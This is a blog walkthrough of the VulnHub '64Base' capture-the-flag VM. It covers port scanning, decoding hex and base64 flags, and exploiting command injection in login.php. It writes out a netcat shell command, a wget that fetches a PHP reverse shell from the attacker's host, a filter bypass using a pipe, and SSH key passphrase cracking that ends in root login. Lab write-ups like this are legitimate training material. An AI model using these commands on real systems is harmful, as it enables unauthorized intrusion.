[VULNHUB] 64Base: 1.0.1

An unexpected Star Wars (I really love it) based VM from VulnHub. It is beautiful and I got a troll too! Let’s see what I’ve done.

FLAG 1

First of all I scanned the open ports:

nmap 192.168.1.16 -p 1-65535 -sV

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-20 18:43 CET
Nmap scan report for 192.168.1.16
Host is up (0.0092s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE    VERSION
80/tcp    open  http       Apache httpd 2.4.10 ((Debian))
4899/tcp  open  tcpwrapped
62964/tcp open  ssh        OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds

Then I scanned the port 80 with nikto:

nikto -h 192.168.1.16

I truncated the output because the robots.txt file was full of entries:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.16
+ Target Hostname:    192.168.1.16
+ Target Port:        80
+ Start Time:         2016-12-20 18:44:08 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1fdf 0x542f6bd9b68a0 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/88888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/c3P08P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/C3p0/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/A280/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/above/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/AC1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/across/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/activation/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Adjustments/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/after/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/against/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/ago/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Pack/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Parking/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
...
+ Entry '/Y888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Y888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Y8b/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Yard/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Zero/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/ZZ/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 429 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /members/: This might be interesting...
+ OSVDB-3092: /order/: This might be interesting...
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
+ 8115 requests: 0 error(s) and 434 item(s) reported on remote host
+ End Time:           2016-12-20 18:44:21 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The only interesting directory seems to be /admin but it required a basic HTTP authentication and I don’t have any username or password. So I analyzed the source code of the index and I discovered this:

5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a

Seems to be an hex encoded string, so I decoded it:

echo "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a-" | xxd -p -r

This is the decoded string:

ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==

This is a base64 encoding:

echo "ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==" | base64 -d

I got the first flag and decoding the base64 content I got:

64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

Cool! Now I have an username and a password.

FLAG 2

I tried the credentials on /admin without success. I spent many hours to find the right way and at the end, reading the post into the blog, I found this:

Only respond if you are a real Imperial-Class BountyHunter

The string Imperial-Class was already familiar, in fact it was inot the robots.txt file but the letter C was lowercase (maybe a typo). So I browsed to http://192.168.1.16/Imperial-Class and I used the found credentials into the basic HTTP authentication. I got an error on the index page:

[☠] ERROR: incorrect path!.... TO THE DARK SIDE!

I looked into the source code and I found this:

don't forget the BountyHunter login

So I browsed to http://192.168.1.16/Imperial-Class/BountyHunter and a login for appeared. I used the same credentials of the previous authentication but nothing changed. I looked into the source code of the page and I found three strings:

5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756
584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32
52714d544a54626d51315a45566157464655614446525557383966516f3d0a

I connected them like a single string:

5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a

And I decoded it from hex:

echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -p -r

I got this:

ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=

Now decode from base64:

echo "ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=" | base64 -d

And I got the second flag.

FLAG 3

For the third flag, I got it with a lot of luck. At this point I had no idea how to go further, then I tried to use curl on login.php:

curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.1.16/Imperial-Class/BountyHunter/login.php"

And I got the third flag as output. I decoded the content from base64 and I got:

53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id

Seems that I found a command injection vulnerability.

FLAG 4

So I browsed to http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=exec&c=id but I didn’t get the expected output. The I remembered the image into the blog post which says “IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377”. So I changed the URL to:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=id

I got the expected output and flag4 too. Decoding the content I found another credentials:

64base:64base5h377

FLAG 5

Now I need to get a shell so I tried:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=nc -lvp 1234 -e /bin/bash

But I get trolled:

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░
░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░
░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░
░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░
░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░
░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░
░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░
░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░
░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░
░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░
░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░
░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░
░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░
░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░
░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░
░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░
░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░
░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░
░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░
░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█
Is this the net cat you are looking for?

LOL! So I tried to download a PHP reverse shell (pentestmonkey) from my local Apache Server:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=wget "http://192.168.1.4/shell.php"

I listed file but the command seemed to don’t work. So I tried to download it recursively:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=wget -r "http://192.168.1.4"

This command didn’t work too. So I tried to dump the variable with PHP function:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=var_dump&c=wget -r "http://192.168.1.4"

And I got:

';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base wget -r http192.168.1.4"

Ok, change a bit the URL evading the escaped character:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=var_dump&c=wget -r 192.168.1.4

The output was correct so I tried to use system again but listing files it didn’t download anything. So I need to escape from the 64base binary file which seems to filter some commands. I tried with | and it worked:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=escape|wget -r 192.168.1.4

Now I have shell.php inside 192.168.1.4 folder. Now I started listen locally:

nc -lvp 1234

Then I browsed to http://192.168.1.16/Imperial-Class/BountyHunter/192.168.1.4/shell.php and I got a shell! Now I searched for the flag:

find -name "*flag*" 2>/dev/null

And I got it:

/var/www/html/admin/flag5{TG9vayBJbnNpZGUhIDpECg==}

FLAG 6

Flag5 was a file so I browsed to /var/www/html/admin and I typed:

python -m SimpleHTTPServer 8080

Then I downloaded the file from http://192.168.1.16:8080 and I checked that it was a JPG image with file command. So I extracted some informations with exiftool, in particular the comment:

4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d39

I decoded it from hex and then from base64 and I got an SSH private key. Then I tried to connect to SSH but the key has a passphrase. So I used phrasendrescher to crack it:

pd pkey -d rockyou.txt -K key

The cracked passphrase is usetheforce. So I retried to connect to the SSH:

ssh root@192.168.1.16 -p 62964 -i key

It worked! And I got the latest flag. Decoding it alternatevely from hex and base64 a few times I got the secret plans of Black Star. And I finished the VM too…

Advertisements
[VULNHUB] 64Base: 1.0.1

2 thoughts on “[VULNHUB] 64Base: 1.0.1

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s